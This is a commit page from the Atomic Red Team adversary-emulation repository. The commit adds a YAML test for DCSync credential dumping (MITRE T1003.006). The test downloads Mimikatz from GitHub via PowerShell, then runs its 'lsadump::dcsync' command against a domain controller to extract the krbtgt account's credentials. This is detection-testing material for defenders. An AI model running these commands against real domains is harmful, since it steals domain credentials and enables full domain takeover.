security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1003.006: add DCSync test (#1352)

Browse Source 
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
This commit is contained in:
Clément Notin
2021-01-06 19:46:59 +01:00
committed by GitHub
parent 603040c6e3
commit d5b6e69f89
1 changed files with 43 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.006/T1003.006.yaml
+43
View File
@@ -0,0 +1,43 @@
attack_technique: T1003.006
display_name: "OS Credential Dumping: DCSync"
atomic_tests:
- name: DCSync
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
description: |
Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
input_arguments:
domain:
description: Targeted domain
type: string
default: example.com
user:
description: Targeted user
type: string
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
executor:
name: command_prompt
elevation_required: false
command: |
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"